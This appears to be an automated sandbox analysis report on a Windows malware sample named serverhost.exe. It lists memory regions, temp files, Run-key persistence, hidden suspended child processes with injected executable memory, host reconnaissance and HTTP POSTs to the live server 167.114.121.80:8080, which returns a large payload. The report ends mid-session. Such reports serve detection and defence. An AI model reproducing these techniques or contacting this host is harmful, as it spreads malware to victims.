private_0x0000000000400000 0x00400000 0x00400fff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x00418fff Private Memory Readable, Writable True True False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory Readable, Writable True False False
private_0x0000000000430000 0x00430000 0x00453fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x00441fff Private Memory Readable, Writable True False False
private_0x0000000000450000 0x00450000 0x0045cfff Private Memory Readable, Writable True False False
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000570000 0x00570000 0x00962fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x00970000 0x00c3efff Memory Mapped File Readable False False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
rpcss.dll 0x01860000 0x018bbfff Memory Mapped File Readable False False False
pagefile_0x0000000001860000 0x01860000 0x0193efff Pagefile Backed Memory Readable True False False
private_0x0000000001940000 0x01940000 0x01963fff Private Memory Readable, Writable True True False
private_0x0000000001940000 0x01940000 0x01951fff Private Memory Readable, Writable True False False
private_0x0000000001960000 0x01960000 0x01971fff Private Memory Readable, Writable True False False
private_0x0000000001970000 0x01970000 0x01978fff Private Memory Readable, Writable True True False
pagefile_0x0000000001980000 0x01980000 0x01996fff Pagefile Backed Memory Readable True False False
private_0x0000000001980000 0x01980000 0x0198ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001980000 0x01980000 0x01987fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001980000 0x01980000 0x01981fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001990000 0x01990000 0x01997fff Pagefile Backed Memory Readable, Writable True False False
index.dat 0x01990000 0x0199ffff Memory Mapped File Readable, Writable True False False
private_0x00000000019a0000 0x019a0000 0x01a9ffff Private Memory Readable, Writable True False False
private_0x0000000001aa0000 0x01aa0000 0x01c0ffff Private Memory Readable, Writable True True False
private_0x0000000001aa0000 0x01aa0000 0x01b9ffff Private Memory Readable, Writable True False False
index.dat 0x01ba0000 0x01ba7fff Memory Mapped File Readable, Writable True False False
index.dat 0x01bb0000 0x01bbffff Memory Mapped File Readable, Writable True False False
private_0x0000000001bc0000 0x01bc0000 0x01bc0fff Private Memory Readable, Writable True True False
pagefile_0x0000000001bc0000 0x01bc0000 0x01bc0fff Pagefile Backed Memory Readable True False False
private_0x0000000001bd0000 0x01bd0000 0x01c0ffff Private Memory Readable, Writable True False False
private_0x0000000001c10000 0x01c10000 0x01c57fff Private Memory Readable, Writable True False False
private_0x0000000001c60000 0x01c60000 0x01ca7fff Private Memory Readable, Writable True False False
rsaenh.dll 0x01cb0000 0x01cebfff Memory Mapped File Readable False False False
private_0x0000000001cb0000 0x01cb0000 0x01d2ffff Private Memory Readable, Writable True True False
private_0x0000000001cb0000 0x01cb0000 0x01ceffff Private Memory Readable, Writable True True False
private_0x0000000001cb0000 0x01cb0000 0x01cbffff Private Memory Readable, Writable True True False
pagefile_0x0000000001cb0000 0x01cb0000 0x01cb0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001cc0000 0x01cc0000 0x01cc0fff Pagefile Backed Memory Readable True False False
private_0x0000000001ce0000 0x01ce0000 0x01ceffff Private Memory Readable, Writable True False False
private_0x0000000001cf0000 0x01cf0000 0x01d15fff Private Memory Readable, Writable, Executable True False False
private_0x0000000001d20000 0x01d20000 0x01d2ffff Private Memory Readable, Writable True False False
private_0x0000000001db0000 0x01db0000 0x01eaffff Private Memory Readable, Writable True False False
private_0x0000000001eb0000 0x01eb0000 0x0200ffff Private Memory Readable, Writable True True False
private_0x0000000001eb0000 0x01eb0000 0x01faffff Private Memory Readable, Writable True False False
private_0x0000000001fd0000 0x01fd0000 0x0200ffff Private Memory Readable, Writable True False False
private_0x0000000002010000 0x02010000 0x0214ffff Private Memory Readable, Writable True True False
private_0x0000000002010000 0x02010000 0x0210ffff Private Memory Readable, Writable True False False
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False
private_0x00000000021d0000 0x021d0000 0x022cffff Private Memory Readable, Writable True False False
private_0x0000000002330000 0x02330000 0x0242ffff Private Memory Readable, Writable True False False
private_0x0000000002430000 0x02430000 0x024d5fff Private Memory Readable, Writable True True False
private_0x00000000024e0000 0x024e0000 0x025dffff Private Memory Readable, Writable True False False
private_0x0000000002730000 0x02730000 0x0276ffff Private Memory Readable, Writable True False False
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable True False False
private_0x0000000009ce0000 0x09ce0000 0x09ddffff Private Memory Readable, Writable True False False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x6e660000 0x6e667fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x6f800000 0x6f805fff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x6f880000 0x6f8d9fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x72040000 0x72045fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x72be0000 0x72bf4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x72c00000 0x72c51fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x733b0000 0x733bcfff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x735a0000 0x735a7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x735b0000 0x735c1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x735d0000 0x735dffff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x73fa0000 0x73fd7fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x740e0000 0x740e6fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x740f0000 0x7410bfff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x747f0000 0x747fffff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x749d0000 0x749d4fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74d00000 0x74d43fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74e30000 0x74e6bfff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x75270000 0x75275fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x753e0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x75890000 0x75892fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76960000 0x76994fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x773e0000 0x773e5fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True False False
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory Readable, Writable True False False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True False False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
For performance reasons, the remaining 35 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\programdata\c570.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\c571.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\c572.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\c572.tmp 0.11 KB (112 bytes) MD5: f10107805ff54bb9c1e1cb047b604439
SHA1: 787f5296c509df55e9dea0f22ea76afaa8953676
SHA256: f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68
False
c:\programdata\c571.tmp 0.11 KB (112 bytes) MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
False
Host Behavior
File (10)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create Temp File C:\ProgramData\C570.tmp path = C:\ProgramData, prefix = 0 True 1
Fn
Create Temp File C:\ProgramData\C571.tmp path = C:\ProgramData, prefix = 0 True 1
Fn
Create Temp File C:\ProgramData\C572.tmp path = C:\ProgramData, prefix = 0 True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe type = size True 1
Fn
Delete C:\ProgramData\C570.tmp True 1
Fn
Delete C:\ProgramData\C571.tmp True 1
Fn
Delete C:\ProgramData\C572.tmp True 1
Fn
Registry (4)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Fn
Process (3)
+
Operation Process Additional Information Success Count Logfile
Create "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" os_pid = 0xc50, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Create "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" os_pid = 0xc58, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Create "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" os_pid = 0xc64, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread (9)
+
Operation Process Additional Information Success Count Logfile
Get Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc20 True 1
Fn
Get Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc30 True 1
Fn
Get Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc24 True 1
Fn
Set Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc20 True 1
Fn
Set Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc30 True 1
Fn
Set Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc24 True 1
Fn
Resume c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc20 True 1
Fn
Resume c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc30 True 1
Fn
Resume c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc24 True 1
Fn
Memory (12)
+
Operation Process Additional Information Success Count Logfile
Allocate "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Allocate "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Fn
Allocate "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Fn
Get Info "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 True 1
Fn
Get Info "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 True 1
Fn
Get Info "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 True 1
Fn
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x400000, size = 114688 True 1
Fn
Data
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x7ffdf008, size = 4 True 1
Fn
Data
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x400000, size = 102400 True 1
Fn
Data
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x7ffdd008, size = 4 True 1
Fn
Data
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x400000, size = 372736 True 1
Fn
Data
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x7ffd4008, size = 4 True 1
Fn
Data
Module (76)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Load advapi32.dll base_address = 0x764f0000 True 5
Fn
Load ole32.dll base_address = 0x77140000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 4
Fn
Load crypt32.dll base_address = 0x755b0000 True 4
Fn
Load urlmon.dll base_address = 0x76f00000 True 4
Fn
Load userenv.dll base_address = 0x74af0000 True 5
Fn
Load wininet.dll base_address = 0x77040000 True 4
Fn
Load wtsapi32.dll base_address = 0x74180000 True 5
Fn
Load mpr.dll base_address = 0x71dd0000 True 1
Fn
Load netapi32.dll base_address = 0x73e90000 True 1
Fn
Load SAMCLI.DLL base_address = 0x734e0000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe base_address = 0xc40000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 7
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2cf31c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2cf33c True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (46)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 3
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Time type = Ticks, time = 110292 True 1
Fn
Get Time type = Ticks, time = 111306 True 1
Fn
Get Time type = Ticks, time = 112305 True 1
Fn
Get Time type = Ticks, time = 113303 True 1
Fn
Get Time type = Ticks, time = 114301 True 1
Fn
Get Time type = Ticks, time = 115300 True 1
Fn
Get Time type = Ticks, time = 116080 True 3
Fn
Get Time type = Ticks, time = 116158 True 1
Fn
Get Time type = Ticks, time = 116298 True 1
Fn
Get Time type = Ticks, time = 116813 True 1
Fn
Get Time type = Ticks, time = 117094 True 3
Fn
Get Time type = Ticks, time = 117172 True 1
Fn
Get Time type = Ticks, time = 117297 True 1
Fn
Get Time type = Ticks, time = 118092 True 1
Fn
Get Time type = Ticks, time = 118139 True 1
Fn
Get Time type = Ticks, time = 118201 True 1
Fn
Get Time type = Ticks, time = 118233 True 1
Fn
Get Time type = Ticks, time = 118373 True 1
Fn
Get Time type = Ticks, time = 119106 True 3
Fn
Get Time type = Ticks, time = 119169 True 1
Fn
Get Time type = Ticks, time = 119293 True 1
Fn
Get Time type = Ticks, time = 120027 True 1
Fn
Get Time type = Ticks, time = 120136 True 3
Fn
Get Time type = Ticks, time = 120167 True 1
Fn
Get Time type = Ticks, time = 120323 True 1
Fn
Get Time type = Ticks, time = 121087 True 3
Fn
Get Time type = Ticks, time = 121165 True 1
Fn
Get Time type = Ticks, time = 121290 True 1
Fn
Get Time type = Ticks, time = 121306 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Get Info type = Operating System False 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (4)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Create mutex_name = Global\I78B95E2E True 1
Fn
Create mutex_name = Global\M78B95E2E True 1
Fn
Release mutex_name = Global\I78B95E2E True 1
Fn
Network Behavior
HTTP Sessions (2)
+
Information Value
Total Data Sent 0.64 KB (660 bytes)
Total Data Received 433.95 KB (444360 bytes)
Contacted Host Count 1
Contacted Hosts 167.114.121.80
HTTP Session #1
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name 167.114.121.80
Server Port 8080
Username 0
Password 0
Data Sent 0.32 KB (330 bytes)
Data Received 433.79 KB (444204 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 True 1
Fn
Open HTTP Request http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = 0 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Read Response size = 444196, size_out = 444196 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session True 2
Fn
HTTP Session #2
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name 167.114.121.80
Server Port 8080
Username 0
Password 0
Data Sent 0.32 KB (330 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 True 1
Fn
Open HTTP Request http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
